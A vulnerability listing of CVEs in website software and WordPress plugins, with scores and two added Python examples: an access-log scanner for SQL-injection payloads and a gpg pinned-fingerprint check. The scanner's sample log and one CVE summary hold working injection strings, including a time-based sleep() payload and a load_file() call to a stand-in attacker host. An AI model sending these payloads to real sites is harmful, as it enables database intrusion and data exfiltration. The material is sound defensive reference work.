Website Security Vulnerabilities

Fields per entry: CVE ID, summary (truncated as on the source page), CVSS score, AI Score, EPSS probability, publication date. "In Wild" marks an entry the source page tagged as exploited in the wild.

CVE-2022-1329
The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that makes it possible for attackers to modify site data in addition to uploading malicious files....
CVSS 8.8 | AI Score 8.5 | EPSS 0.96 | Published 2022-04-19 09:15 PM

CVE-2022-27357
Ecommerce-Website v1 was discovered to contain an arbitrary file upload vulnerability via /customer_register.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP...
CVSS 9.8 | AI Score 9.7 | EPSS 0.104 | Published 2022-04-08 09:15 AM

CVE-2022-27346
Ecommerce-Website v1.1.0 was discovered to contain an arbitrary file upload vulnerability via /admin/index.php?slides. This vulnerability allows attackers to execute arbitrary code via a crafted PHP...
CVSS 8.8 | AI Score 8.9 | EPSS 0.044 | Published 2022-04-08 09:15 AM

CVE-2022-26615
A cross-site scripting (XSS) vulnerability in College Website Content Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User Profile Name text...
CVSS 5.4 | AI Score 5.2 | EPSS 0.001 | Published 2022-04-05 02:15 AM

CVE-2022-27436
A cross-site scripting (XSS) vulnerability in /public/admin/index.php?add_user at Ecommerce-Website v1.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username text...
CVSS 4.8 | AI Score 4.9 | EPSS 0.001 | Published 2022-04-04 02:15 PM

CVE-2022-27435
An unrestricted file upload at /public/admin/index.php?add_product of Ecommerce-Website v1.1.0 allows attackers to upload a webshell via the Product Image...
CVSS 8.8 | AI Score 8.6 | EPSS 0.005 | Published 2022-04-04 02:15 PM

CVE-2022-1075
A vulnerability was found in College Website Management System 1.0 and classified as problematic. Affected by this issue is the file /cwms/classes/Master.php?f=save_contact of the component Contact Handler. The manipulation leads to persistent cross site scripting. The attack may be launched...
CVSS 5.4 | AI Score 5.1 | EPSS 0.001 | Published 2022-03-29 06:15 AM

CVE-2022-1078
A vulnerability was found in SourceCodester College Website Management System 1.0. It has been classified as critical. Affected is the file /cwms/admin/?page=articles/view_article/. The manipulation of the argument id with the input ' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc with...
CVSS 9.8 | AI Score 9.7 | EPSS 0.001 | Published 2022-03-29 06:15 AM

CVE-2022-26283
Simple Subscription Website v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the view_plan endpoint. This vulnerability allows attackers to dump the application's database via crafted HTTP...
CVSS 9.8 | AI Score 9.6 | EPSS 0.003 | Published 2022-03-21 11:15 PM

CVE-2022-26170
Simple Mobile Comparison Website v1.0 was discovered to contain a SQL injection vulnerability via the search...
CVSS 9.8 | AI Score 9.8 | EPSS 0.002 | Published 2022-03-02 11:15 PM

CVE-2021-25014
The Ibtana WordPress plugin before 1.1.4.9 does not have authorisation and CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated user, such as a subscriber, to call it and change the plugin's settings, which could lead to Stored Cross-Site Scripting...
CVSS 3.5 | AI Score 3.7 | EPSS 0.001 | Published 2022-02-14 12:15 PM

CVE-2021-44593
Simple College Website 1.0 is vulnerable to unauthenticated file upload & remote code execution via UNION-based SQL injection in the username parameter on...
CVSS 8.1 | AI Score 8.8 | EPSS 0.014 | Published 2022-01-21 07:15 PM

CVE-2021-45255
The email parameter from ajax.php of Video Sharing Website 1.0 appears to be vulnerable to SQL injection attacks. A payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain,...
CVSS 9.8 | AI Score 9.7 | EPSS 0.002 | Published 2021-12-21 12:15 PM
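The two injection shapes above are easy to hunt for retroactively. The following is an added example (not code from the source page or from any of the affected products) that flags, in web-server access logs, the time-based blind payload that CVE-2022-1078 quotes (MySQL sleep()), the out-of-band load_file() + UNC-path payload of CVE-2021-45255, and the UNION form of CVE-2021-44593. The log lines, client addresses and the attacker.example hostname are constructed for the example; in the real CVE-2021-45255 the email parameter was likely sent in a request body, which a standard access log does not record, so the example sends it in the query string.

```python
"""
Added example, not code from the source page or from the affected products:
flag, in web-server access logs, the SQL-injection payload shapes described by
CVE-2022-1078 (time-based blind injection with MySQL sleep()),
CVE-2021-45255 (out-of-band injection with load_file() and a UNC path) and
CVE-2021-44593 (UNION-based injection). Log lines, IPs and hostnames below
are constructed for this example.
"""
import re
from urllib.parse import unquote_plus

# Combined log format: client, identd, user, [timestamp], "METHOD target HTTP/x", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Each rule is applied to the URL-decoded request target (path + query string).
RULES = [
    # e.g. ' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc
    ("time-based blind SQLi, cf. CVE-2022-1078",
     re.compile(r"\b(sleep|benchmark)\s*\(\s*\d", re.I)),
    # e.g. load_file('\\\\attacker.example\\share'): MySQL reaches out to the UNC path.
    # Hex-encoded (0x...) path arguments are not covered by this rule.
    ("out-of-band SQLi via load_file() + UNC path, cf. CVE-2021-45255",
     re.compile(r"load_file\s*\(\s*[^)]*\\\\[\w.-]+", re.I)),
    ("UNION-based SQLi, cf. CVE-2021-44593",
     re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
]


def parse_line(line: str):
    """Parse one access-log line; returns None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # One URL-decode so %27 / %20 / %5C become ' / space / backslash before matching.
    # Double-encoded payloads would need a second pass.
    rec["decoded"] = unquote_plus(rec["target"])
    return rec


def scan(lines):
    """Return (rule_label, client_ip, decoded_target) for every rule each line trips.
    A single request can trip more than one rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for label, rx in RULES:
            if rx.search(rec["decoded"]):
                hits.append((label, rec["ip"], rec["decoded"]))
    return hits


# Constructed sample log: a benign request, the CVE-2022-1078 payload against the CWMS
# view_article page, an out-of-band load_file() payload sent in the query string, and a
# benign query containing the word "sleeping" to show the word-boundary handling.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Mar/2022:06:14:58 +0000] "GET /cwms/admin/?page=articles/view_article/&id=5 HTTP/1.1" 200 4821',
    '198.51.100.23 - - [29/Mar/2022:06:15:00 +0000] "GET /cwms/admin/?page=articles/view_article/&id=5%27%20and%20(select%20*%20from(select(sleep(10)))Avx)%20and%20%27abc%27%20%3D%20%27abc HTTP/1.1" 200 4821',
    '198.51.100.23 - - [21/Dec/2021:12:15:03 +0000] "GET /ajax.php?action=login&email=x%27%20union%20select%20load_file(%27%5C%5C%5C%5Cattacker.example%5C%5Cx%27)--%20- HTTP/1.1" 200 17',
    '203.0.113.7 - - [21/Dec/2021:12:16:40 +0000] "GET /search.php?q=sleeping+bag HTTP/1.1" 200 9023',
]

if __name__ == "__main__":
    for label, ip, target in scan(SAMPLE_LOG):
        print(f"{ip}: {label}\n    {target}")
```

Running it reports one hit for the sleep() request and two for the load_file() request (it also trips the UNION rule), and nothing for the two benign lines. A time-based probe is also visible without any payload matching: the response time for the injected request is roughly the sleep() argument in seconds, so pairing this with the request-duration field that nginx ($request_time) or Apache (%D) can log catches variants the regexes miss.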
CVE-2021-24891
The Elementor Website Builder WordPress plugin before 3.4.8 does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting...
CVSS 6.1 | AI Score 6 | EPSS 0.001 | Published 2021-11-23 08:15 PM

CVE-2021-43140
SQL Injection vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the...
CVSS 9.8 | AI Score 9.8 | EPSS 0.012 | Published 2021-11-03 07:15 PM

CVE-2021-43141
Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in...
CVSS 6.1 | AI Score 6 | EPSS 0.003 | Published 2021-11-03 07:15 PM | In Wild

CVE-2021-37270
There is an unauthorized access vulnerability in the CMS Enterprise Website Construction System 5.0. Attackers can directly access a specified backend path without logging in to the backend, obtaining backend administrator...
CVSS 9.8 | AI Score 9.2 | EPSS 0.002 | Published 2021-09-27 09:15 PM

CVE-2021-38347
The Custom Website Data WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the id parameter found in the ~/views/edit.php file, which allows attackers to inject arbitrary web scripts, in versions up to and including...
CVSS 6.1 | AI Score 6 | EPSS 0.001 | Published 2021-09-10 02:15 PM

CVE-2021-24303
The JiangQie Official Website Mini Program WordPress plugin before 1.1.1 does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection...
CVSS 8.8 | AI Score 9 | EPSS 0.001 | Published 2021-09-06 11:15 AM

CVE-2021-34166
A SQL injection vulnerability in Sourcecodester Simple Food Website 1.0 allows a remote attacker to bypass authentication and become...
CVSS 9.8 | AI Score 9.5 | EPSS 0.002 | Published 2021-07-30 02:15 PM

CVE-2021-25204
Cross-site scripting (XSS) vulnerability in SourceCodester E-Commerce Website v 1.0 allows remote attackers to inject arbitrary web script or HTML via the subject field to...
CVSS 5.4 | AI Score 5.3 | EPSS 0.001 | Published 2021-07-23 02:15 PM

CVE-2021-25207
Arbitrary file upload vulnerability in SourceCodester E-Commerce Website v 1.0 allows attackers to execute arbitrary code via the file upload to...
CVSS 9.8 | AI Score 9.7 | EPSS 0.008 | Published 2021-07-23 01:15 PM

CVE-2021-25205
SQL injection vulnerability in SourceCodester E-Commerce Website V 1.0 allows remote attackers to execute arbitrary SQL statements via the update parameter to empViewUpdate.php...
CVSS 9.8 | AI Score 9.9 | EPSS 0.002 | Published 2021-07-22 08:15 PM

CVE-2021-26232
SQL injection vulnerability in SourceCodester Simple College Website v 1.0 allows remote attackers to execute arbitrary SQL statements via the id parameter to...
CVSS 9.8 | AI Score 9.9 | EPSS 0.002 | Published 2021-07-22 05:15 PM

CVE-2021-24204
In the Elementor Website Builder WordPress plugin before 3.1.4, the accordion widget (includes/widgets/accordion.php) accepts a 'title_html_tag' parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send...
CVSS 5.4 | AI Score 5.4 | EPSS 0.001 | Published 2021-04-05 07:15 PM

CVE-2021-24205
In the Elementor Website Builder WordPress plugin before 3.1.4, the icon box widget (includes/widgets/icon-box.php) accepts a 'title_size' parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
CVSS 5.4 | AI Score 5.4 | EPSS 0.001 | Published 2021-04-05 07:15 PM

CVE-2021-24206
In the Elementor Website Builder WordPress plugin before 3.1.4, the image box widget (includes/widgets/image-box.php) accepts a 'title_size' parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
CVSS 5.4 | AI Score 5.4 | EPSS 0.001 | Published 2021-04-05 07:15 PM

CVE-2021-24203
In the Elementor Website Builder WordPress plugin before 3.1.4, the divider widget (includes/widgets/divider.php) accepts an 'html_tag' parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
CVSS 5.4 | AI Score 5.5 | EPSS 0.001 | Published 2021-04-05 07:15 PM

CVE-2021-24201
In the Elementor Website Builder WordPress plugin before 3.1.4, the column element (includes/elements/column.php) accepts an 'html_tag' parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
CVSS 5.4 | AI Score 5.4 | EPSS 0.001 | Published 2021-04-05 07:15 PM

CVE-2021-24202
In the Elementor Website Builder WordPress plugin before 3.1.4, the heading widget (includes/widgets/heading.php) accepts a 'header_size' parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a...
CVSS 5.4 | AI Score 5.5 | EPSS 0.001 | Published 2021-04-05 07:15 PM

CVE-2020-36171
The Elementor Website Builder plugin before 3.0.14 for WordPress does not properly restrict SVG...
CVSS 6.1 | AI Score 6.3 | EPSS 0.001 | Published 2021-01-06 03:15 PM

CVE-2020-15020
An issue was discovered in the Elementor plugin through 2.9.13 for WordPress. An authenticated attacker can achieve stored XSS via the Name Your Template...
CVSS 5.4 | AI Score 5.4 | EPSS 0.0004 | Published 2020-08-31 01:15 PM

CVE-2020-20634
Elementor 2.9.5 and below WordPress plugin allows authenticated users to activate its safe mode feature. This can be exploited to disable all security plugins on the...
CVSS 6.5 | AI Score 6.3 | EPSS 0.001 | Published 2020-08-21 03:15 PM

CVE-2020-8426
The Elementor plugin before 2.8.5 for WordPress suffers from a reflected XSS vulnerability on the elementor-system-info page. These can be exploited by targeting an authenticated...
CVSS 5.4 | AI Score 5.2 | EPSS 0.001 | Published 2020-01-28 11:15 PM

CVE-2020-7109
The Elementor Page Builder plugin before 2.8.4 for WordPress does not sanitize data during creation of a new...
CVSS 9.8 | AI Score 9.4 | EPSS 0.002 | Published 2020-01-22 05:15 PM

CVE-2018-17840
SQL injection exists in Scriptzee Education Website 1.0 via the college_list.html subject, city, or country...
CVSS 9.8 | AI Score 9.8 | EPSS 0.003 | Published 2019-06-19 05:15 PM

CVE-2019-7553
PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has Stored XSS in the Profile Update page via the My Name...
CVSS 5.4 | AI Score 5.2 | EPSS 0.001 | Published 2019-06-06 04:29 PM

CVE-2018-12556
The signature verification routine in install.sh in yarnpkg/website through 2018-06-05 only verifies that the yarn release is signed by any (arbitrary) key in the local keyring of the user, and does not pin the signature to the yarn release key, which allows remote attackers to sign tampered yarn...
CVSS 5.9 | AI Score 6.6 | EPSS 0.004 | Published 2019-05-16 05:29 PM
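CVE-2018-12556 is a supply-chain bug that recurs in many install scripts: gpg --verify exits 0 for a good signature from any key in the user's keyring, so an installer that only checks the exit code accepts a tampered release signed by any key the user ever imported. The following is an added example (not code from yarnpkg/website) of the missing check, in Python rather than the original shell: it reads gpg's machine-readable --status-fd transcript and accepts a release only if the VALIDSIG line names the pinned release-key fingerprint and no failure tag is present. PINNED_FPR and the three status transcripts are constructed placeholders, not the real yarn key or real gpg runs.

```python
"""
Added example, not code from yarnpkg/website: the check CVE-2018-12556
describes as missing from install.sh. A good signature from ANY key in the
keyring makes `gpg --verify` exit 0, so the installer must also pin the
release key's full fingerprint. This parses gpg's --status-fd output and
accepts only a GOODSIG whose VALIDSIG carries the pinned fingerprint.
PINNED_FPR and the transcripts below are constructed placeholders.
"""
import subprocess

# Hypothetical 40-hex-digit fingerprint of the release key; ship it inside the installer.
PINNED_FPR = "0123456789ABCDEF0123456789ABCDEF01234567"

# Status tags after which verification must fail outright.
REJECT_TAGS = {"BADSIG", "ERRSIG", "EXPSIG", "EXPKEYSIG", "REVKEYSIG", "NODATA", "NO_PUBKEY"}


def gpg_status(sig_path: str, data_path: str) -> str:
    """Run gpg and return its status-fd transcript (needs gpg and the imported key)."""
    proc = subprocess.run(
        ["gpg", "--batch", "--status-fd", "1", "--verify", sig_path, data_path],
        capture_output=True, text=True, check=False,
    )
    return proc.stdout


def signature_fingerprints(status: str) -> set:
    """Fingerprints named by VALIDSIG lines: the first field is the signing (sub)key,
    the optional 10th field after it is the primary key. GOODSIG only carries a 64-bit
    key id, which is too short to pin on."""
    fprs = set()
    for line in status.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "[GNUPG:]" and parts[1] == "VALIDSIG":
            fprs.add(parts[2].upper())
            if len(parts) >= 12:
                fprs.add(parts[11].upper())
    return fprs


def verify_pinned(status: str, pinned_fpr: str = PINNED_FPR) -> bool:
    """True only for a good, unexpired, unrevoked signature made by the pinned key."""
    pinned = pinned_fpr.replace(" ", "").upper()
    good = False
    for line in status.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0] != "[GNUPG:]":
            continue
        if parts[1] in REJECT_TAGS:
            return False
        if parts[1] == "GOODSIG":
            good = True
    return good and pinned in signature_fingerprints(status)


# Constructed transcripts (not real gpg output): the release signed by the pinned key;
# the release re-signed by another key that happens to be in the keyring, which gpg
# itself reports as a good signature (the CVE-2018-12556 case); and an expired key.
STATUS_PINNED = """[GNUPG:] NEWSIG
[GNUPG:] GOODSIG 89ABCDEF01234567 Release Key <release@example.invalid>
[GNUPG:] VALIDSIG 0123456789ABCDEF0123456789ABCDEF01234567 2018-06-05 1528156800 0 4 0 1 10 00 0123456789ABCDEF0123456789ABCDEF01234567
[GNUPG:] TRUST_UNDEFINED 0 pgp
"""
STATUS_OTHER_KEY = """[GNUPG:] NEWSIG
[GNUPG:] GOODSIG 76543210FEDCBA98 Someone Else <other@example.invalid>
[GNUPG:] VALIDSIG FEDCBA9876543210FEDCBA9876543210FEDCBA98 2018-06-05 1528156800 0 4 0 1 10 00 FEDCBA9876543210FEDCBA9876543210FEDCBA98
[GNUPG:] TRUST_UNDEFINED 0 pgp
"""
STATUS_EXPIRED = """[GNUPG:] NEWSIG
[GNUPG:] EXPKEYSIG 89ABCDEF01234567 Release Key <release@example.invalid>
[GNUPG:] VALIDSIG 0123456789ABCDEF0123456789ABCDEF01234567 2018-06-05 1528156800 0 4 0 1 10 00 0123456789ABCDEF0123456789ABCDEF01234567
"""

if __name__ == "__main__":
    for name, status in [("pinned key", STATUS_PINNED),
                         ("other keyring key", STATUS_OTHER_KEY),
                         ("expired key", STATUS_EXPIRED)]:
        print(f"{name}: {'accept' if verify_pinned(status) else 'reject'}")
```

Only the first transcript is accepted; the second is exactly the case the CVE describes (a signature gpg calls good, but from a key the installer never meant to trust), and the third shows why GOODSIG must be required explicitly rather than relying on VALIDSIG alone. The same comparison in the original shell form is gpg --status-fd 1 --verify piped through grep for the VALIDSIG line and a string compare against the embedded fingerprint.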
CVE-2018-20638
PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has directory traversal via a direct request for a listing of an image directory such as an assets/...
CVSS 6.5 | AI Score 6.5 | EPSS 0.001 | Published 2019-03-21 04:00 PM

CVE-2018-20631
PHP Scripts Mall Website Seller Script 2.0.5 allows full path disclosure via a request for an arbitrary image URL such as a .png...
CVSS 5.3 | AI Score 5.4 | EPSS 0.002 | Published 2019-03-21 04:00 PM

CVE-2018-20637
PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 allows remote attackers to cause a denial of service (unrecoverable blank profile) via crafted JavaScript code in the First Name and Last Name...
CVSS 6.5 | AI Score 6.5 | EPSS 0.001 | Published 2019-03-21 04:00 PM

CVE-2018-20636
PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has HTML injection via the First Name...
CVSS 5.4 | AI Score 5.8 | EPSS 0.001 | Published 2019-03-21 04:00 PM

CVE-2019-9063
PHP Scripts Mall Auction website script 2.0.4 allows parameter tampering of the payment...
CVSS 6.5 | AI Score 6.5 | EPSS 0.001 | Published 2019-02-23 09:29 PM

CVE-2018-20530
PHP Scripts Mall Website Seller Script 2.0.5 has XSS via a Profile field such as Company Address, a related issue to...
CVSS 5.4 | AI Score 5.2 | EPSS 0.001 | Published 2018-12-28 04:29 PM

CVE-2018-16456
PHP Scripts Mall Website Seller Script 2.0.5 has XSS via a keyword. NOTE: This may overlap with CVE-2018-6870 which has XSS via the Listings Search...
CVSS 6.1 | AI Score 5.9 | EPSS 0.001 | Published 2018-10-04 09:29 PM

CVE-2018-15897
PHP Scripts Mall Website Seller Script 2.0.5 allows remote attackers to cause a denial of service via crafted JavaScript code in the First Name, Last Name, Company Name, or Fax field, as demonstrated by...
CVSS 6.5 | AI Score 6.6 | EPSS 0.001 | Published 2018-08-28 09:29 PM

CVE-2018-15896
PHP Scripts Mall Website Seller Script 2.0.5 has XSS via Personal Address or Company...
CVSS 5.4 | AI Score 5.3 | EPSS 0.001 | Published 2018-08-28 09:29 PM

CVE-2018-15186
PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has CSRF via...
CVSS 8.8 | AI Score 8.7 | EPSS 0.001 | Published 2018-08-10 03:29 PM

CVE-2018-13256
PHP Scripts Mall Auditor Website 2.0.1 has XSS via the lastname or firstname...
CVSS 6.1 | AI Score 6 | EPSS 0.001 | Published 2018-07-09 12:29 PM

CVE-2018-11501
PHP Scripts Mall Website Seller Script 2.0.3 has CSRF via user_submit.php?upd=2, with resultant...
CVSS 8.8 | AI Score 8.7 | EPSS 0.001 | Published 2018-05-26 09:29 PM

Total number of security vulnerabilities: 272